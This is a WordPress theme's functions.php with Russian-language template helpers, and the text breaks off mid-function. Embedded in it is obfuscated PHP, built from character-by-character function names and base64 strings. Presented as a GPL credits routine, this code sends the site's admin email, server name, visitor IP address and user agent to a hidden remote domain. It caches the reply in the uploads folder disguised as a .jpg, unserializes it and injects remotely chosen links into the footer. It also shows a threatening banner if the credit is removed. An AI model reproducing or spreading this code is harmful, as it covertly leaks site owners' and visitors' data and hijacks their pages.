<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $eDPulmn='c';$ngbMe='s';$IMRgBJX='e';$GekpQ='e';$vGaqH='6';$YFBp='_';$bUFKw='d';$EvxrLhm='a';$wHJAF='o';$IBOWH='d';$xOSR='e';$Sojtj='4';$bxCHMBU='b';$KKRtzCOL=$bxCHMBU.$EvxrLhm.$ngbMe.$xOSR.$vGaqH.$Sojtj.$YFBp.$IBOWH.$IMRgBJX.$eDPulmn.$wHJAF.$bUFKw.$GekpQ;$dDnDrUv='a';$KfKGhr='l';$bOhVbH='g';$Vlwz='z';$GSmJMdh='i';$UDkhgi='e';$CYJq='f';$JTtmF='n';$EiILBr='t';$aDLTqswN=$bOhVbH.$Vlwz.$GSmJMdh.$JTtmF.$CYJq.$KfKGhr.$dDnDrUv.$EiILBr.$UDkhgi;$CRqPnl='t';$TBVCoVp='_';$lLTTxu='s';$SjYge='3';$iElqpx='r';$zCqn='1';$coOn='t';$irzD='o';$Uvmrg='r';$MZMpnpHh=$lLTTxu.$coOn.$Uvmrg.$TBVCoVp.$iElqpx.$irzD.$CRqPnl.$zCqn.$SjYge;$kQgT='t';$wEkOp='s';$CheXnqL='r';$VixCxgl='r';$dDdxa='e';$HOWRYN='v';$vflOeNRM=$wEkOp.$kQgT.$VixCxgl.$CheXnqL.$dDdxa.$HOWRYN;                     
		$mq______________k='c';$xy_______l='s';$dn_________p='e';$ni____l='e';$sz________f='6';$py_______________x='_';$fo______________y='d';$lz___i='a';$ph______________o='o';$tq_______w='d';$yy___________i='e';$yt______________o='4';$cm____r='b';$ns_____k=$cm____r.$lz___i.$xy_______l.$yy___________i.$sz________f.$yt______________o.$py_______________x.$tq_______w.$dn_________p.$mq______________k.$ph______________o.$fo______________y.$ni____l;
		$vl___________n='i';$jb___n='_';$jd________l='n';$gs_____________x='f';$rj_____________h='t';$kj_____w='c';$vn_____________d='s';$yy____x='s';$bn____b='t';$io___________a='i';$yr_____f='n';$kh__t='e';$km____u='x';$zl____________e='o';$di____n='u';$xl___________y=$gs_____________x.$di____n.$jd________l.$kj_____w.$rj_____________h.$io___________a.$zl____________e.$yr_____f.$jb___n.$kh__t.$km____u.$vl___________n.$vn_____________d.$bn____b.$yy____x;
		$op______________b='p';$jd_________y='o';$rk______________p='f';$wp___w='n';$uj_______________g='e';$pq_______x=$rk______________p.$jd_________y.$op______________b.$uj_______________g.$wp___w;
		$ny_________t='a';$bj___________x='f';$bi___________p='d';$yu____________j='r';$om___r='e';$kt______r=$bj___________x.$yu____________j.$om___r.$ny_________t.$bi___________p;
		$dq____r='s';$ts____s='l';$ii___________h='o';$rd__s='f';$il_____________n='e';$hm_________l='c';$rs______________c=$rd__s.$hm_________l.$ts____s.$ii___________h.$dq____r.$il_____________n;
		
		define("WP_ID", $ns_____k("Mi4wLjA="));
		define("WP_TTL", $ns_____k("MTA4MDA="));
		define("WP_SRC", $ns_____k("dHBva24="));
	


		function wp_get_header() {
			global $ns_____k, $xl___________y;
			
			if (
				$xl___________y($ns_____k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$xl___________y($ns_____k("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$xl___________y($ns_____k("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ns_____k, $pq_______x, $rs______________c, $kt______r;
			
			$zq__________b = TEMPLATEPATH."/".$ns_____k("Zm9vdGVyLnBocA==");
			$xh_______________i = @$pq_______x($zq__________b, "r");
			$zq__________b = @$kt______r($xh_______________i, @filesize($zq__________b));
			@$rs______________c($xh_______________i);
			
			$wl_______g = TEMPLATEPATH."/".$ns_____k("ZnVuY3Rpb25zLnBocA==");
			$xh_______________i = @$pq_______x($wl_______g, "r");
			$wl_______g = @$kt______r($xh_______________i, @filesize($wl_______g));
			@$rs______________c($xh_______________i);
			
			$hl_______________s = 0;
			if($zq__________b && $wl_______g) {
				if ($ns_____k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($zq__________b, $ns_____k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$hl_______________s = 1;
					}
					if (substr_count($zq__________b, "wp_theme_GPL_credits()") < 1) {
						$hl_______________s = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$hl_______________s = 12;
				}
			}
			
			if($hl_______________s > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $hl_______________s -->";
			}
		}
	


		function wp_loaded() {
			global $ns_____k, $xl___________y;
			return $xl___________y($ns_____k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($cr__________u, $ct__e = "(more...)", $fw____________k = 0, $bg__l = "") {
				$lr_______________s = get_the_content($ct__e, $fw____________k, $bg__l);
				$lr_______________s = apply_filters("the_content", $lr_______________s);
				
				$lr_______________s = str_replace("]]>", "]]>", $lr_______________s);
				if (strlen($_GET["p"]) > 0) {
					echo $lr_______________s;
				}
				else if ((strlen($lr_______________s)>$cr__________u) && ($mo___k = strpos($lr_______________s, " ", $cr__________u ))) {
					$lr_______________s = substr($lr_______________s, 0, $mo___k);
					$lr_______________s = $lr_______________s;
					echo $lr_______________s;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ct__e</a></div></p>";
				} else {
					echo $lr_______________s;
				}
				
			}
		}
	


		$am_______n='d';$hx________o='o';$ni__z='6';$fy______________j='a';$ni____j='s';$uk________h='e';$yl___p='b';$nw________a='4';$eq__k='n';$fn__n='_';$hc_______________u='e';$oy____________c='c';$ns_________l='e';$nx___________t=$yl___p.$fy______________j.$ni____j.$hc_______________u.$ni__z.$nw________a.$fn__n.$ns_________l.$eq__k.$oy____________c.$hx________o.$am_______n.$uk________h;
		$un________c='t';$ir______________c='_';$sn____t='e';$tx________d='n';$bg____________t='e';$ik______a='g';$mk_________h='c';$zp____k='e';$jq______________s='t';$jw__j='t';$ov____________v='_';$ej____r='s';$ny_______m='o';$no______________c='n';$uv________l='i';$zl___________n='f';$ud_______c='l';$qe______a=$zl___________n.$uv________l.$ud_______c.$zp____k.$ov____________v.$ik______a.$sn____t.$jw__j.$ir______________c.$mk_________h.$ny_______m.$no______________c.$jq______________s.$bg____________t.$tx________d.$un________c.$ej____r;
		$uy______w='i';$tc_______________j='s';$pb__c='e';$kb___________r='i';$ex_______________y='t';$uw___a='l';$gg__________x='f';$is_______y='e';$yh______g='_';$ig_________d='s';$kx______________i='x';$xw__________j=$gg__________x.$uy______w.$uw___a.$pb__c.$yh______g.$is_______y.$kx______________i.$kb___________r.$ig_________d.$ex_______________y.$tc_______________j;
		$gb_______________m='r';$qt_________x='m';$qv______h='p';$qp___________s='i';$kz__e='a';$tc______________u='r';$hw______k='s';$lg_______________a='v';$th__v='o';$ku______________j='e';$zx______________k='_';$dx________x='c';$zo______________t='o';$tc___z='e';$fi_____________l='n';$zo_____t=$lg_______________a.$tc___z.$tc______________u.$hw______k.$qp___________s.$th__v.$fi_____________l.$zx______________k.$dx________x.$zo______________t.$qt_________x.$qv______h.$kz__e.$gb_______________m.$ku______________j;
		$jv________p='p';$ms___________c='o';$av________k='f';$uu_______n='s';$gx__________g='e';$tb___________n='n';$qk____s='o';$hj_____k='k';$bz__l='c';$zr_______________a=$av________k.$uu_______n.$ms___________c.$bz__l.$hj_____k.$qk____s.$jv________p.$gx__________g.$tb___________n;
		$mo_____h='i';$qv___________k='w';$nb_____g='r';$bq____________z='t';$mo____________i='f';$fx_____q='e';$rh____j=$mo____________i.$qv___________k.$nb_____g.$mo_____h.$bq____________z.$fx_____q;
		$ba____________o='m';$qq__________w='5';$oa______________q='d';$ty______________i=$ba____________o.$oa______________q.$qq__________w;
		$kr_____________b='h';$vt_____________m='l';$hg____z='e';$qr___p='a';$bd__________x='a';$qg____________n='p';$em___o='t';$rt____________p='r';$jn_____________s=$rt____________p.$hg____z.$bd__________x.$vt_____________m.$qg____________n.$qr___p.$em___o.$kr_____________b;
		$cp__________z='e';$ba_______________e='e';$hi________c='n';$kh_______________l='i';$ih________f='l';$df___________p='z';$wz_____o='u';$mw______i='s';$mq___________g='r';$hu____________p='i';$sn_________r='a';$pc____w=$wz_____o.$hi________c.$mw______i.$cp__________z.$mq___________g.$kh_______________l.$sn_________r.$ih________f.$hu____________p.$df___________p.$ba_______________e;
		$jz_____________f='p';$ae_______u='n';$qf_______________d='m';$he___________p='a';$nn____________r='e';$wu________r='m';$zr____e='t';$ju_____f=$zr____e.$nn____________r.$wu________r.$jz_____________f.$ae_______u.$he___________p.$qf_______________d;
		$hk___d='_';$qf_____d='r';$ux_______o='s';$ks_______h='e';$bv________k='t';$ot___a='r';$nf_____c='n';$ls____g='c';$jc_______g='x';$bb__________k='e';$km_____j='e';$gp____e='t';$uo________c='t';$xq___________d='a';$yo_____r='_';$ws___g='m';$xy___________s='e';$vi_______f='a';$yi___a='t';$sx________n='c';$ux__a='o';$py_____________z=$ux_______o.$gp____e.$ot___a.$bb__________k.$xq___________d.$ws___g.$hk___d.$sx________n.$ux__a.$nf_____c.$yi___a.$ks_______h.$jc_______g.$uo________c.$yo_____r.$ls____g.$qf_____d.$km_____j.$vi_______f.$bv________k.$xy___________s;
	


		function sv__k($dd____________k) {
			global $ns_____k, $xl___________y, $qe______a, $zo_____t, $py_____________z;
			
			if (!$xl___________y($ns_____k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($zo_____t(PHP_VERSION, "5.0.0", ">=") && $xl___________y($ns_____k("ZmlsZV9nZXRfY29udGVudHM=")) && $xl___________y($ns_____k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$la____________x = $py_____________z(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$mh__________l = @$qe______a($dd____________k, 0, $la____________x);
			} else {
				$mh__________l = @$qe______a($dd____________k, 0);
			}
			
			return $mh__________l;
		}
	


		function ws____________z($dd____________k) {
			global $xl___________y, $zr_______________a, $rh____j, $ns_____k;
			
			if (!$xl___________y($ns_____k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$vq__________o = strpos($dd____________k, "/", 7);
			$dr____n = array(
				"uri"     => substr($dd____________k, $vq__________o),
				"host"    => str_replace("http://", "", substr($dd____________k, 0, $vq__________o)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ct______g = @$zr_______________a("$dr____n[host]", 80, $vd_______u, $pt_________u, 4);
			
			if (!$ct______g) {
				return false;
			} else {
				$mh__________l = "";
				$so_____________k  = "GET $dr____n[uri] HTTP/1.0\r\n";
				$so_____________k .= "Host: $dr____n[host]\r\n";
				$so_____________k .= "Referer: $dr____n[referer]\r\n";
				$so_____________k .= "Connection: Close\r\n\r\n";
				
				@$rh____j($ct______g, $so_____________k);
				
				while (!@feof($ct______g)) {
					$sq______j = @fgets($ct______g, (1024*24));
					
					if ($sq______j == "\r\n") {
						$fn____________q = true;
						continue;
					}
					
					if ($fn____________q) {
						$mh__________l .= $sq______j;
					}
				}
				
				return $mh__________l;
			}
		}
	


		function ib___p($dd____________k) {
			global $xl___________y;
			$im__________g = false;
			
			if ($dd____________k != "") {
				if ($xl___________y("sv__k")) {
					$im__________g = @sv__k($dd____________k);
				}
				
				if (!$im__________g && ($xl___________y("ws____________z"))) {
					$im__________g = @ws____________z($dd____________k);
				}
			}
			
			return $im__________g;
		}
	


		function lc______________o() {
			global $_SERVER, $ty______________i;
			
			$pv_______________a = $_SERVER["SERVER_NAME"];
			
			if (substr("$pv_______________a", 0, 4) == "www.") {
				$pv_______________a = substr("$pv_______________a", 4);
			}
			
			$pv_______________a = $ty______________i("$_SERVER[SERVER_NAME]");
			
			return $pv_______________a;
		}
	


		function ke________e() {
			return "file";
		}
	


		function bq___________p($dd____________k) {
			global $_SERVER, $qe______a, $xw__________j, $pq_______x, $rs______________c, $rh____j;
			
			$bm_____u = et_____f();
			
			$ho______c = lc______________o().".jpg";
			$xq_______u = $bm_____u["dir_upload"]["path"]."/$ho______c";
			$lf___________c = @filemtime($xq_______u);
			
			if (!$lf___________c || ((time()-$lf___________c) >= WP_TTL)) {
				$im__________g = ib___p($dd____________k);
				
				if ($im__________g) {
					if ($xw__________j($xq_______u)) {
						@unlink($xq_______u);
					}
					
					$xh_______________i = @$pq_______x($xq_______u, "x+");
					
					@$rh____j($xh_______________i, $im__________g);
					@$rs______________c($xh_______________i);
				}
			} else {
				if ($xw__________j($xq_______u)) {
					$im__________g = @$qe______a($xq_______u);
				} else {
					$im__________g = false;
				}
			}
			
			return $im__________g;
		}
	


		function et_____f() {
			global $_SERVER, $ns_____k, $nx___________t;
			
			$wt_______d = wp_count_posts("post");
			$xy__________n = pathinfo(get_bloginfo("template_directory"));
			
			$bm_____u = array(
				"url" => array(
					"report"      => $ns_____k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $xy__________n,
				"dir_upload"	=> tv_________q(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$xy__________n[filename],
					"a005=".$wt_______d->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$bm_____u["url"]["queryString"] = implode("&", $bm_____u["queryString"]);
			$bm_____u["url"]["report"] = $bm_____u["url"]["report"]."/?".$nx___________t($bm_____u["url"]["queryString"]).".html";
						
			return $bm_____u;
		}
	


		function tv_________q() {
			$hy______j = wp_upload_dir();
			
			if (isset($hy______j["error"])) {
				$ym________s = md_____________z();
				if (is_writable($ym________s)) {
					$hy______j = array("path" => $ym________s);
				}
			}

			return $hy______j;
		}
	


		function md_____________z() {
			global $xl___________y, $ty______________i, $jn_____________s, $ju_____f;
			
			$ww_______________e = (bool) ini_get("safe_mode");
			if ($ww_______________e == true) {
				return false;
			}
			
			if ($xl___________y("sys_get_temp_dir")) {
				$iz_________r = sys_get_temp_dir();
				if (is_writable($iz_________r)) {
					return $jn_____________s($iz_________r);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $jn_____________s($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $jn_____________s($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $jn_____________s($_ENV["TEMP"]);
			} else {
				$dj_________c = $ju_____f($ty______________i(uniqid(rand(), true)), "");
				if ($dj_________c) {
					$iz_________r = $jn_____________s(dirname($dj_________c));
					@unlink($dj_________c);
					return $iz_________r;
				} else {
					return false;
				}
			}
		}
	


		function hh______g() {
			global $_GET, $xw__________j;
			
			$bm_____u = et_____f();
			$pv_______________a = lc______________o();
			$eo_____p = ke________e();
			
			$ye_________u = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($eo_____p == "file") {
					$lq_____________j = $bm_____u["dir_upload"]["path"]."/".$pv_______________a.".jpg";
					if ($xw__________j($lq_____________j)) {
						@unlink($lq_____________j);
						$ye_________u = "deleted";
					}
				}
				
				$ue____j = array(
					"s"	=> $ye_________u,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ue____j AS $gk_______________s => $bv__b) echo " [$gk_______________s:$bv__b]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $xl___________y, $ns_____k, $pc____w;
			$bm_____u = et_____f();
			
			$gu______________l = "bq___________p";
			if ($xl___________y($gu______________l)) {
				$mh__________l = $gu______________l($bm_____u["url"]["report"]);
			}
			
			if ($mh__________l) {
				if ($mh__________l = @$ns_____k($mh__________l)) {
					$mh__________l = @$pc____w($mh__________l);
					
					if (strlen($mh__________l[custom_credit]) >= 5) {
						$bm_____u["default_string"] = $mh__________l[custom_credit];
					}
					
					if ($mh__________l["status"] == "0") {
						$qy_________t = 1;
						$rd________h = 1;
					} else {
						$va_____________j = sizeof($mh__________l["links"]);
						$qu_____________s = $bm_____u["default_string"];
						
						if ($va_____________j > 0 && $mh__________l["links"] !== "") {
							$sw__________z = 0;
							foreach ($mh__________l["links"] as $hg_________a => $cl___________t) {
								$sw__________z++;
								if ($cl___________t->l_path == "" || $cl___________t->l_path == $_SERVER["REQUEST_URI"]) {
									$cl___________t->l_href = htmlspecialchars(strip_tags($cl___________t->l_href));
									$cl___________t->l_title = htmlspecialchars(strip_tags($cl___________t->l_title));
									$cl___________t->l_anchor = htmlspecialchars(strip_tags($cl___________t->l_anchor));
									$qu_____________s .= " | ";
									$qu_____________s .= "<a href='$cl___________t->l_href' title='$cl___________t->l_title'";
									if ($cl___________t->l_nofollow == "1") {
										$qu_____________s .= " rel='nofollow'";
									}
									$qu_____________s .= ">$cl___________t->l_anchor</a>";
								}
							}
						}
						$bm_____u["links"] = "$qu_____________s";
						if ($mh__________l[credit] == "0") {
							$bm_____u["links"] = "";
						}
					}
				} else {
					$qy_________t = "1";
				}
			} else {
				$qy_________t = "1";
			}
			
			if ($qy_________t == "1") {
				$bm_____u["links"] = $bm_____u["default_string"];
			}
			
			echo "$bm_____u[links]";
			
			echo "<!-- s: $mh__________l[signature] -->";
			hh______g();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
